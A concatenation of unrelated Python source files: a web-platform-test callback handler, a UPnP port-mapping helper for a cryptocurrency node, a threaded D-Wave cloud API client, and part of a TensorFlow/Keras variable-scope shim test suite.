conn = httplib.HTTPConnection(self.server.host, self.server.port)
conn.request("HEAD", self.server.base_path + "invalid")
res = conn.getresponse()
return res.status == 404
class CallbackHandler(object):
"""Handle callbacks from testdriver-using tests.
The default implementation here makes sense for things that are roughly like
WebDriver. Things that are more different to WebDriver may need to create a
fully custom implementation."""
def __init__(self, logger, protocol, test_window):
self.protocol = protocol
self.test_window = test_window
self.logger = logger
self.callbacks = {
"action": self.process_action,
"complete": self.process_complete
}
self.actions = {
"click": ClickAction(self.logger, self.protocol),
"send_keys": SendKeysAction(self.logger, self.protocol)
}
def __call__(self, result):
url, command, payload = result
self.logger.debug("Got async callback: %s" % result[1])
try:
callback = self.callbacks[command]
except KeyError:
raise ValueError("Unknown callback type %r" % result[1])
return callback(url, payload)
def process_complete(self, url, payload):
rv = [url] + payload
return True, rv
def process_action(self, url, payload):
parent = self.protocol.base.current_window
try:
self.protocol.base.set_window(self.test_window)
action = payload["action"]
self.logger.debug("Got action: %s" % action)
try:
action_handler = self.actions[action]
except KeyError:
raise ValueError("Unknown action %s" % action)
try:
action_handler(payload)
except Exception:
self.logger.warning("Action %s failed" % action)
self.logger.warning(traceback.format_exc())
self._send_message("complete", "failure")
else:
self.logger.debug("Action %s completed" % action)
self._send_message("complete", "success")
finally:
self.protocol.base.set_window(parent)
return False, None
def _send_message(self, message_type, status, message=None):
self.protocol.testdriver.send_message(message_type, status, message=message)
class ClickAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
selector = payload["selector"]
elements = self.protocol.select.elements_by_selector(selector)
if len(elements) == 0:
raise ValueError("Selector matches no elements")
elif len(elements) > 1:
raise ValueError("Selector matches multiple elements")
self.logger.debug("Clicking element: %s" % selector)
self.protocol.click.element(elements[0])
class SendKeysAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
selector = payload["selector"]
keys = payload["keys"]
elements = self.protocol.select.elements_by_selector(selector)
if len(elements) == 0:
raise ValueError("Selector matches no elements")
elif len(elements) > 1:
raise ValueError("Selector matches multiple elements")
self.logger.debug("Sending keys to element: %s" % selector)
self.protocol.send_keys.send_keys(elements[0], keys)
|
upnp.py
|
import logging
import threading
from queue import Queue
from typing import Optional
try:
import miniupnpc
except ImportError:
pass
log = logging.getLogger(__name__)
class UPnP:
thread: Optional[threading.Thread] = None
queue: Queue = Queue()
def __init__(self):
def run():
try:
self.upnp = miniupnpc.UPnP()
self.upnp.discoverdelay = 30
self.upnp.discover()
self.upnp.selectigd()
keep_going = True
while keep_going:
msg = self.queue.get()
if msg[0] == "remap":
port = msg[1]
log.info(f"Attempting to enable UPnP (open up port {port})")
try:
self.upnp.deleteportmapping(port, "TCP")
except Exception as e:
log.info(f"Removal of previous portmapping failed. This does not indicate an error: {e}")
self.upnp.addportmapping(port, "TCP", self.upnp.lanaddr, port, "littlelambocoin", "")
log.info(
f"Port {port} opened with UPnP. lanaddr {self.upnp.lanaddr} "
f"external: {self.upnp.externalipaddress()}"
)
elif msg[0] == "release":
port = msg[1]
log.info(f"UPnP, releasing port {port}")
self.upnp.deleteportmapping(port, "TCP")
log.info(f"UPnP, Port {port} closed")
elif msg[0] == "shutdown":
keep_going = False
except Exception as e:
log.info(
"UPnP failed. This is not required to run littlelambocoin, it allows incoming connections from other peers."
)
log.info(e)
self.thread = threading.Thread(target=run)
self.thread.start()
def remap(self, port):
self.queue.put(("remap", port))
def release(self, port):
self.queue.put(("release", port))
def shutdown(self):
if not self.thread:
return
self.queue.put(("shutdown",))
log.info("UPnP, shutting down thread")
self.thread.join()
self.thread = None
# this is here just in case the UPnP object is destroyed non-gracefully,
# e.g. via an exception before the main thread can call shutdown()
def __del__(self):
self.shutdown()
|
client.py
|
from __future__ import division, absolute_import
import threading
import time
import sys
import posixpath
import logging
import requests
import collections
import datetime
from itertools import chain
from six.moves import queue, range
from dwave.cloud.exceptions import *
from dwave.cloud.config import load_config, legacy_load_config
from dwave.cloud.solver import Solver
_LOGGER = logging.getLogger(__name__)
# _LOGGER.setLevel(logging.DEBUG)
# _LOGGER.addHandler(logging.StreamHandler(sys.stdout))
class Client(object):
"""
Base client for all D-Wave API clients.
Implements workers (and handles thread pools) for problem submittal, task
cancellation, problem status polling and results downloading.
Args:
endpoint (str):
D-Wave API endpoint URL.
token (str):
Authentication token for the D-Wave API.
solver (str):
Default solver.
proxy (str):
Proxy URL to be used for accessing the D-Wave API.
permissive_ssl (bool, default=False):
Disables SSL verification.
"""
# The status flags that a problem can have
STATUS_IN_PROGRESS = 'IN_PROGRESS'
STATUS_PENDING = 'PENDING'
STATUS_COMPLETE = 'COMPLETED'
STATUS_FAILED = 'FAILED'
STATUS_CANCELLED = 'CANCELLED'
# Cases when multiple status flags qualify
ANY_STATUS_ONGOING = [STATUS_IN_PROGRESS, STATUS_PENDING]
ANY_STATUS_NO_RESULT = [STATUS_FAILED, STATUS_CANCELLED]
# Number of problems to include in a status query
_STATUS_QUERY_SIZE = 100
# Number of worker threads for each problem processing task
_SUBMISSION_THREAD_COUNT = 5
_CANCEL_THREAD_COUNT = 1
_POLL_THREAD_COUNT = 2
_LOAD_THREAD_COUNT = 5
@classmethod
def from_config(cls, config_file=None, profile=None, client=None,
endpoint=None, token=None, solver=None, proxy=None,
**kwargs):
"""Client factory method which loads configuration from file(s),
process environment variables and explicitly provided values, creating
and returning the appropriate client instance
(:class:`dwave.cloud.qpu.Client` or :class:`dwave.cloud.sw.Client`).
Example:
Create ``dwave.conf`` in your current directory or
``~/.config/dwave/dwave.conf``::
[prod]
endpoint = https://cloud.dwavesys.com/sapi
token = DW-123123-secret
solver = DW_2000Q_1
Run::
from dwave.cloud import Client
client = Client.from_config(profile='prod')
solver = client.get_solver()
computation = solver.sample_ising({}, {})
samples = computation.result()
TODO: describe config loading, new config in broad strokes, refer to
actual loaders' doc; include examples for config and usage.
TODO: mention kwargs include `permissive_ssl`, but are not limited to
that.
"""
# try loading configuration from a preferred new config subsystem
# (`./dwave.conf`, `~/.config/dwave/dwave.conf`, etc)
try:
config = load_config(
config_file=config_file, profile=profile, client=client,
endpoint=endpoint, token=token, solver=solver, proxy=proxy)
except ValueError:
config = dict(
endpoint=endpoint, token=token, solver=solver, proxy=proxy,
client=client)
# and failback to the legacy `.dwrc`
if config.get('token') is None or config.get('endpoint') is None:
try:
_endpoint, _token, _proxy, _solver = legacy_load_config(
key=profile,
endpoint=endpoint, token=token, solver=solver, proxy=proxy)
config = dict(
endpoint=_endpoint, token=_token, solver=_solver, proxy=_proxy,
client=client)
except (ValueError, IOError):
pass
# manual override of other (client-custom) arguments
for var, val in kwargs.items():
config[var] = val
from dwave.cloud import qpu, sw
_clients = {'qpu': qpu.Client, 'sw': sw.Client}
_client = config.pop('client', None) or 'qpu'
return _clients[_client](**config)
def __init__(self, endpoint=None, token=None, solver=None, proxy=None,
permissive_ssl=False, **kwargs):
"""To setup the connection a pipeline of queues/workers is constructed.
There are five interations with the server the connection manages:
1. Downloading solver information.
2. Submitting problem data.
3. Polling problem status.
4. Downloading problem results.
5. Canceling problems
Loading solver information is done synchronously. The other four tasks
are performed by asynchronously workers. For 2, 3, and 5 the workers
gather tasks in batches.
"""
if not endpoint or not token:
raise ValueError("Endpoint URL and/or token not defined")
_LOGGER.debug("Creating a client for endpoint: %r", endpoint)
self.endpoint = endpoint
self.token = token
self.default_solver = solver
# Create a :mod:`requests` session. `requests` will manage our url parsing, https, etc.
self.session = requests.Session()
self.session.headers.update({'X-Auth-Token': self.token})
self.session.proxies = {'http': proxy, 'https': proxy}
if permissive_ssl:
self.session.verify = False
# Build the problem submission queue, start its workers
self._submission_queue = queue.Queue()
self._submission_workers = []
for _ in range(self._SUBMISSION_THREAD_COUNT):
worker = threading.Thread(target=self._do_submit_problems)
worker.daemon = True
worker.start()
self._submission_workers.append(worker)
# Build the cancel problem queue, start its workers
self._cancel_queue = queue.Queue()
self._cancel_workers = []
for _ in range(self._CANCEL_THREAD_COUNT):
worker = threading.Thread(target=self._do_cancel_problems)
worker.daemon = True
worker.start()
self._cancel_workers.append(worker)
# Build the problem status polling queue, start its workers
self._poll_queue = queue.Queue()
self._poll_workers = []
for _ in range(self._POLL_THREAD_COUNT):
worker = threading.Thread(target=self._do_poll_problems)
worker.daemon = True
worker.start()
self._poll_workers.append(worker)
# Build the result loading queue, start its workers
self._load_queue = queue.Queue()
self._load_workers = []
for _ in range(self._LOAD_THREAD_COUNT):
worker = threading.Thread(target=self._do_load_results)
worker.daemon = True
worker.start()
self._load_workers.append(worker)
# Prepare an empty set of solvers
self._solvers = {}
self._solvers_lock = threading.RLock()
self._all_solvers_ready = False
# Set the parameters for requests; disable SSL verification if needed
self._request_parameters = {}
if permissive_ssl:
self._request_parameters['verify'] = False
def close(self):
"""Perform a clean shutdown.
Wait for all the currently scheduled work to finish, kill the workers,
and close the connection pool. Assumes no one is submitting more work
while the connection is closing.
"""
# Finish all the work that requires the connection
_LOGGER.debug("Joining submission queue")
self._submission_queue.join()
_LOGGER.debug("Joining cancel queue")
self._cancel_queue.join()
_LOGGER.debug("Joining poll queue")
self._poll_queue.join()
_LOGGER.debug("Joining load queue")
self._load_queue.join()
# Send kill-task to all worker threads
# Note: threads can't be 'killed' in Python, they have to die by
# natural causes
for _ in self._submission_workers:
self._submission_queue.put(None)
for _ in self._cancel_workers:
self._cancel_queue.put(None)
for _ in self._poll_workers:
self._poll_queue.put(None)
for _ in self._load_workers:
self._load_queue.put(None)
# Wait for threads to die
for worker in chain(self._submission_workers, self._cancel_workers,
self._poll_workers, self._load_workers):
worker.join()
# Close the requests session
self.session.close()
def __enter__(self):
"""Let connections be used in with blocks."""
return self
def __exit__(self, *args):
"""At the end of a with block perform a clean shutdown of the connection."""
self.close()
return False
@staticmethod
def is_solver_handled(solver):
"""Predicate function that determines if the given solver should be
handled by this client.
Can be overridden in a subclass to specialize the client for a
particular type of solvers.
Default implementation accepts all solvers.
"""
return True
def get_solvers(self, refresh=False):
"""List all the solvers this client can provide, and load the data
about the solvers.
This is a blocking web call to `{endpoint}/solvers/remote/`` that
caches the result and populates a list of available solvers described
through :class:`.Solver` instances.
To submit a sampling problem to the D-Wave API, filter the list returned
and execute a ``sampling_*`` method on the solver of interest.
Alternatively, if you know the solver name (or it's defined in config),
use the :meth:`.get_solver` method.
Args:
refresh (bool, default=False):
By default, ``get_solvers`` caches the list of solvers it
receives from the API. Use this parameter to force refresh.
Returns:
dict[id, solver]: a mapping of solver name/id to :class:`.Solver`
"""
with self._solvers_lock:
if self._all_solvers_ready and not refresh:
return self._solvers
_LOGGER.debug("Requesting list of all solver data.")
response = self.session.get(
posixpath.join(self.endpoint, 'solvers/remote/'))
if response.status_code == 401:
raise SolverAuthenticationError
response.raise_for_status()
_LOGGER.debug("Received list of all solver data.")
data = response.json()
for solver_desc in data:
try:
solver = Solver(self, solver_desc)
if self.is_solver_handled(solver):
self._solvers[solver.id] = solver
_LOGGER.debug("Adding solver %r", solver)
else:
_LOGGER.debug("Skipping solver %r inappropriate for client", solver)
except UnsupportedSolverError as e:
_LOGGER.debug("Skipping solver due to %r", e)
self._all_solvers_ready = True
return self._solvers
def get_solver(self, name=None, refresh=False):
"""Load the configuration for a single solver, as publicized by the API
on ``{endpoint}/solvers/remote/{solver_name}/``.
This is a blocking web call that returns a :class:`.Solver` instance,
which in turn can be used to submit sampling problems to the D-Wave API
and fetch the results.
Args:
name (str):
Id of the requested solver. ``None`` will return the default solver.
refresh (bool):
Return solver from cache (if cached with ``get_solvers()``),
unless set to ``True``.
Returns:
:class:`.Solver`
"""
_LOGGER.debug("Looking for solver: %s", name)
if name is None:
if self.default_solver:
name = self.default_solver
else:
raise ValueError("No name or default name provided when loading solver.")
with self._solvers_lock:
if refresh or name not in self._solvers:
response = self.session.get(
posixpath.join(self.endpoint, 'solvers/remote/{}/'.format(name)))
if response.status_code == 401:
raise SolverAuthenticationError
if response.status_code == 404:
raise KeyError("No solver with the name {} was available".format(name))
response.raise_for_status()
solver = Solver(self, data=response.json())
if solver.id != name:
raise InvalidAPIResponseError(
"Asked for solver named {!r}, got {!r}".format(name, solver.id))
self._solvers[name] = solver
return self._solvers[name]
def _submit(self, body, future):
"""Enqueue a problem for submission to the server.
This method is thread safe.
"""
self._submission_queue.put(self._submit.Message(body, future))
_submit.Message = collections.namedtuple('Message', ['body', 'future'])
def _do_submit_problems(self):
"""Pull problems from the submission queue and submit them.
Note:
This method is always run inside of a daemon thread.
"""
try:
while True:
# Pull as many problems as we can, block on the first one,
# but once we have one problem, switch to non-blocking then
# submit without blocking again.
# `None` task is used to signal thread termination
item = self._submission_queue.get()
if item is None:
break
ready_problems = [item]
while True:
try:
ready_problems.append(self._submission_queue.get_nowait())
except queue.Empty:
break
# Submit the problems
_LOGGER.debug("submitting {} problems".format(len(ready_problems)))
body = '[' + ','.join(mess.body for mess in ready_problems) + ']'
try:
response = self.session.post(posixpath.join(self.endpoint, 'problems/'), body)
if response.status_code == 401:
raise SolverAuthenticationError()
response.raise_for_status()
message = response.json()
_LOGGER.debug("Finished submitting {} problems".format(len(ready_problems)))
except BaseException as exception:
if not isinstance(exception, SolverAuthenticationError):
exception = IOError(exception)
for mess in ready_problems:
mess.future._set_error(exception, sys.exc_info())
self._submission_queue.task_done()
continue
# Pass on the information
for submission, res in zip(ready_problems, message):
self._handle_problem_status(res, submission.future, False)
self._submission_queue.task_done()
# this is equivalent to a yield to scheduler in other threading libraries
time.sleep(0)
except BaseException as err:
_LOGGER.exception(err)
def _handle_problem_status(self, message, future, in_poll):
"""Handle the results of a problem submission or results request.
This method checks the status of the problem and puts it in the correct queue.
Args:
message (dict): Update message from the SAPI server wrt. this problem.
future `Future`: future corresponding to the problem
in_poll (bool): Flag set to true if the problem is in the poll loop already.
Returns:
true if the problem has been processed out of the status poll loop
Note:
This method is always run inside of a daemon thread.
"""
try:
status = message['status']
_LOGGER.debug("Status: %s %s", message['id'], status)
# The future may not have the ID set yet
with future._single_cancel_lock:
# This handles the case where cancel has been called on a future
# before that future received the problem id
if future._cancel_requested:
if not future._cancel_sent and status == self.STATUS_PENDING:
# The problem has been canceled but the status says its still in queue
# try to cancel it
self._cancel(message['id'], future)
# If a cancel request could meaningfully be sent it has been now
future._cancel_sent = True
# Set the id field in the future
future.id = message['id']
future.remote_status = status
if future.time_received is not None and 'submitted_on' in message and message['submitted_on'] is not None:
future.time_received = datetime.strptime(message['submitted_on'])
if future.time_solved is not None and 'solved_on' in message and message['solved_on'] is not None:
future.time_solved = datetime.strptime(message['solved_on'])
if status == self.STATUS_COMPLETE:
# If the message is complete, forward it to the future object
if 'answer' in message:
future._set_message(message)
# If the problem is complete, but we don't have the result data
# put the problem in the queue for loading results.
else:
self._load(future)
elif status in self.ANY_STATUS_ONGOING:
# If the response is pending add it to the queue.
if not in_poll:
self._poll(future)
return False
elif status == self.STATUS_CANCELLED:
# If canceled return error
future._set_error(CanceledFutureError())
else:
# Return an error to the future object
future._set_error(SolverFailureError(message.get('error_message', 'An unknown error has occurred.')))
except Exception as error:
# If there were any unhandled errors we need to release the
# lock in the future, otherwise deadlock occurs.
future._set_error(error, sys.exc_info())
return True
def _cancel(self, id_, future):
"""Enqueue a problem to be canceled.
This method is thread safe.
"""
self._cancel_queue.put((id_, future))
def _do_cancel_problems(self):
"""Pull ids from the cancel queue and submit them.
Note:
This method is always run inside of a daemon thread.
"""
try:
while True:
# Pull as many problems as we can, block when none are available.
# `None` task is used to signal thread termination
item = self._cancel_queue.get()
if item is None:
break
item_list = [item]
while True:
try:
item_list.append(self._cancel_queue.get_nowait())
except queue.Empty:
break
# Submit the problems, attach the ids as a json list in the
# body of the delete query.
try:
body = [item[0] for item in item_list]
self.session.delete(posixpath.join(self.endpoint, 'problems/'), json=body)
except Exception as err:
for _, future in item_list:
if future is not None:
future._set_error(err, sys.exc_info())
# Mark all the ids as processed regardless of success or failure.
[self._cancel_queue.task_done() for _ in item_list]
# this is equivalent to a yield to scheduler in other threading libraries
time.sleep(0)
except Exception as err:
_LOGGER.exception(err)
def _poll(self, future):
"""Enqueue a problem to poll the server for status.
This method is threadsafe.
"""
self._poll_queue.put(future)
def _do_poll_problems(self):
"""Poll the server for the status of a set of problems.
Note:
This method is always run inside of a daemon thread.
"""
try:
# Maintain an active group of queries
futures = {}
active_queries = set()
# Add a query to the active queries
def add(ftr):
# `None` task signifies thread termination
if ftr is None:
return False
if ftr.id not in futures and not ftr.done():
active_queries.add(ftr.id)
futures[ftr.id] = ftr
else:
self._poll_queue.task_done()
return True
# Remove a query from the active set
def remove(id_):
del futures[id_]
active_queries.remove(id_)
self._poll_queue.task_done()
while True:
try:
# If we have no active queries, wait on the status queue
while len(active_queries) == 0:
if not add(self._poll_queue.get()):
return
# Once there is any active queries try to fill up the set and move on
while len(active_queries) < self._STATUS_QUERY_SIZE:
if not add(self._poll_queue.get_nowait()):
return
except queue.Empty:
pass
# Build a query string with block of ids
_LOGGER.debug("Query on futures: %s", ', '.join(active_queries))
query_string = 'problems/?id=' + ','.join(active_queries)
try:
response = self.session.get(posixpath.join(self.endpoint, query_string))
if response.status_code == 401:
raise SolverAuthenticationError()
response.raise_for_status()
message = response.json()
except BaseException as exception:
if not isinstance(exception, SolverAuthenticationError):
exception = IOError(exception)
for id_ in list(active_queries):
futures[id_]._set_error(IOError(exception), sys.exc_info())
remove(id_)
continue
# If problems are removed from the polling by _handle_problem_status
# remove them from the active set
for single_message in message:
if self._handle_problem_status(single_message, futures[single_message['id']], True):
remove(single_message['id'])
# Remove the finished queries
for id_ in list(active_queries):
if futures[id_].done():
remove(id_)
# this is equivalent to a yield to scheduler in other threading libraries
time.sleep(0)
except Exception as err:
_LOGGER.exception(err)
def _load(self, future):
"""Enqueue a problem to download results from the server.
Args:
future: Future` object corresponding to the query
This method is threadsafe.
"""
self._load_queue.put(future)
def _do_load_results(self):
"""Submit a query asking for the results for a particular problem.
To request the results of a problem: ``GET /problems/{problem_id}/``
Note:
This method is always run inside of a daemon thread.
"""
try:
while True:
# Select a problem
future = self._load_queue.get()
# `None` task signifies thread termination
if future is None:
break
_LOGGER.debug("Query for results: %s", future.id)
# Submit the query
query_string = 'problems/{}/'.format(future.id)
try:
response = self.session.get(posixpath.join(self.endpoint, query_string))
if response.status_code == 401:
raise SolverAuthenticationError()
response.raise_for_status()
message = response.json()
except BaseException as exception:
if not isinstance(exception, SolverAuthenticationError):
exception = IOError(exception)
future._set_error(IOError(exception), sys.exc_info())
continue
# Dispatch the results, mark the task complete
self._handle_problem_status(message, future, False)
self._load_queue.task_done()
# this is equivalent to a yield to scheduler in other threading libraries
time.sleep(0)
except Exception as err:
_LOGGER.error('Load result error: ' + str(err))
|
variable_scope_shim_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for variable store."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v2 as tf
import gc
import threading
from absl.testing import parameterized
import numpy
from tensorflow.python.framework import test_util
from keras import combinations
from keras import regularizers
from keras.engine import input_layer as input_layer_module
from keras.engine import training as training_module
from keras.layers import core
from keras.legacy_tf_layers import core as core_layers
from keras.legacy_tf_layers import variable_scope_shim
from tensorflow.python.ops import variable_scope
def run_inside_wrap_function_in_eager_mode(graph_function):
"""Decorator to execute the same graph code in eager and graph modes.
In graph mode, we just execute the graph_function passed as argument. In eager
mode, we wrap the function using wrap_function and then execute the wrapped
result.
Args:
graph_function: python function containing graph code to be wrapped
Returns:
decorated function
"""
def wrap_and_execute(self):
store = variable_scope_shim._EagerVariableStore()
with variable_scope.with_variable_store(store):
# use the original function
graph_function(self)
return wrap_and_execute
class VariableScopeTest(tf.test.TestCase):
def tearDown(self):
gc.collect()
# This will only contain uncollectable garbage, i.e. reference cycles
# involving objects with __del__ defined.
self.assertEqual(0, len(gc.garbage))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVar(self):
vs = variable_scope._get_default_variable_store()
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertIs(v, v1)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNameExists(self):
vs = variable_scope._get_default_variable_store()
# No check by default, so we can both create and get existing names.
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertIs(v, v1)
self.assertIsNot(v, vs.get_variable("u", [1], reuse=False))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNamelessStore(self):
vs = variable_scope._get_default_variable_store()
vs.get_variable("v1", [2])
vs.get_variable("v2", [2])
expected_names = ["%s:0" % name for name in ["v1", "v2"]]
self.assertEqual(
set(expected_names), set(v.name for v in vs._vars.values()))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Expected tf.group() expected Tensor arguments not 'None' with
# type '<type 'NoneType'>'
@test_util.run_in_graph_and_eager_modes
def testVarScopeInitializer(self):
init = tf.compat.v1.constant_initializer(0.3)
with tf.compat.v1.variable_scope("tower0") as tower:
with tf.compat.v1.variable_scope("foo", initializer=init):
v = tf.compat.v1.get_variable("v", [])
self.evaluate(tf.compat.v1.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.3)
with tf.compat.v1.variable_scope(tower, initializer=init):
w = tf.compat.v1.get_variable("w", [])
self.evaluate(tf.compat.v1.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.3)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeConstraint(self):
constraint = lambda x: 0. * x
with tf.compat.v1.variable_scope("tower1") as tower:
with tf.compat.v1.variable_scope("foo", constraint=constraint):
v = tf.compat.v1.get_variable("v", [])
self.assertIsNotNone(v.constraint)
with tf.compat.v1.variable_scope(tower, constraint=constraint):
w = tf.compat.v1.get_variable("w", [])
self.assertIsNotNone(w.constraint)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeDType(self):
with tf.compat.v1.variable_scope("tower2") as tower:
with tf.compat.v1.variable_scope("foo", dtype=tf.float16):
v = tf.compat.v1.get_variable("v", [])
self.assertEqual(v.dtype.base_dtype, tf.float16)
with tf.compat.v1.variable_scope(tower, dtype=tf.float16):
w = tf.compat.v1.get_variable("w", [])
self.assertEqual(w.dtype.base_dtype, tf.float16)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testInitFromNonTensorValue(self):
v = tf.compat.v1.get_variable("v4", initializer=4, dtype=tf.int32)
self.evaluate(tf.compat.v1.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 4)
w = tf.compat.v1.get_variable(
"w4", initializer=numpy.array([1, 2, 3]), dtype=tf.int64)
self.evaluate(tf.compat.v1.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), [1, 2, 3])
# A quirk to be revisited?
error = ValueError if tf.executing_eagerly() else TypeError
with self.assertRaises(error):
tf.compat.v1.get_variable("x4", initializer={})
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testInitFromNonInitializer(self):
# Test various dtypes with zeros initializer as following:
types = [
tf.int8, tf.uint8, tf.int16, tf.uint16, tf.int32,
tf.int64, tf.bool
]
# Use different variable_name to distinguish various dtypes
for (i, dtype) in enumerate(types):
x = tf.compat.v1.get_variable(
name="xx%d" % i, shape=(3, 4), dtype=dtype)
y = tf.compat.v1.get_variable(
name="yy%d" % i,
shape=(3, 4),
dtype=dtype,
initializer=tf.compat.v1.zeros_initializer(dtype=dtype))
self.evaluate(tf.compat.v1.global_variables_initializer())
self.assertAllEqual(self.evaluate(x.value()), self.evaluate(y.value()))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeRegularizer(self):
init = tf.compat.v1.constant_initializer(0.3)
def regularizer1(v):
return tf.reduce_mean(v) + 0.1
def regularizer2(v):
return tf.reduce_mean(v) + 0.2
with tf.compat.v1.variable_scope(
"tower3", regularizer=regularizer1) as tower:
with tf.compat.v1.variable_scope("foo", initializer=init):
v = tf.compat.v1.get_variable("v", [])
self.evaluate(tf.compat.v1.variables_initializer([v]))
with tf.compat.v1.variable_scope(tower, initializer=init) as vs:
tf.compat.v1.get_variable("u", [])
vs.set_regularizer(regularizer2)
tf.compat.v1.get_variable("w", [])
# Next 3 variable not regularized to test disabling regularization.
tf.compat.v1.get_variable(
"x", [], regularizer=tf.compat.v1.no_regularizer)
with tf.compat.v1.variable_scope(
"baz", regularizer=tf.compat.v1.no_regularizer):
tf.compat.v1.get_variable("y", [])
vs.set_regularizer(tf.compat.v1.no_regularizer)
tf.compat.v1.get_variable("z", [])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testInitializeFromValue(self):
init = tf.constant(0.1)
w = tf.compat.v1.get_variable("v", initializer=init)
self.evaluate(tf.compat.v1.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.1)
with self.assertRaisesRegex(ValueError, "shape"):
# We disallow explicit shape specification when initializer is constant.
tf.compat.v1.get_variable("u", [1], initializer=init)
with tf.compat.v1.variable_scope("foo", initializer=init):
# Constant initializer can be passed through scopes if needed.
v = tf.compat.v1.get_variable("v")
self.evaluate(tf.compat.v1.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.1)
# Check that non-float32 initializer creates a non-float32 variable.
init = tf.constant(1, dtype=tf.int32)
t = tf.compat.v1.get_variable("t", initializer=init)
self.assertEqual(t.dtype.base_dtype, tf.int32)
# Raise error if `initializer` dtype and `dtype` are not identical.
with self.assertRaisesRegex(ValueError, "don't match"):
tf.compat.v1.get_variable("s", initializer=init, dtype=tf.float64)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetOrCreateReuse(self):
with self.cached_session():
def test_value(value):
x = tf.constant(value)
with tf.compat.v1.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=tf.compat.v1.AUTO_REUSE):
_ = tf.compat.v1.assign(tf.compat.v1.get_variable("var", []), x)
with tf.compat.v1.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=tf.compat.v1.AUTO_REUSE):
_ = tf.compat.v1.get_variable("var", [])
self.assertEqual(value, self.evaluate(x))
test_value(42.) # Variable is created.
test_value(13.) # Variable is reused hereafter.
test_value(17.)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetOrCreateReuseIgnoreFalse(self):
with self.cached_session():
def test_value(value):
x = tf.constant(value)
with tf.compat.v1.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=False):
_ = tf.compat.v1.assign(tf.compat.v1.get_variable("var", []), x)
# We need to ignore reuse=False in the shim, because the
# code is expected to get rerun each time the user calls the shim.
with tf.compat.v1.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=False):
_ = tf.compat.v1.get_variable("var", [])
self.assertEqual(value, self.evaluate(x))
test_value(42.) # Variable is created.
test_value(13.) # Variable is reused hereafter.
test_value(17.)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScope(self):
with self.cached_session():
with tf.name_scope("testVarOpScope1"):
with tf.compat.v1.variable_scope("tower", "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "tower/w:0")
with tf.name_scope("testVarOpScope2"):
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "default/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "default_1/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeUniqueNamesInterleavedSubstringScopes(self):
with self.cached_session():
with tf.compat.v1.variable_scope(None, "defaultScope1"):
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"defaultScope1/layer/w:0")
with tf.compat.v1.variable_scope(None, "defaultScope1"):
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"defaultScope1_1/layer/w:0")
with tf.compat.v1.variable_scope(None, "defaultScope"):
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"defaultScope/layer/w:0")
with tf.compat.v1.variable_scope(None, "defaultScope1"):
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"defaultScope1_2/layer/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeUniqueNamesWithJump(self):
with self.cached_session():
with tf.compat.v1.variable_scope("default") as default:
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "default/layer/w:0")
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"default/layer_1/w:0")
with tf.compat.v1.variable_scope(default):
pass
# No matter the jump in the middle, unique numbering continues.
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"default/layer_2/w:0")
@test_util.run_in_graph_and_eager_modes
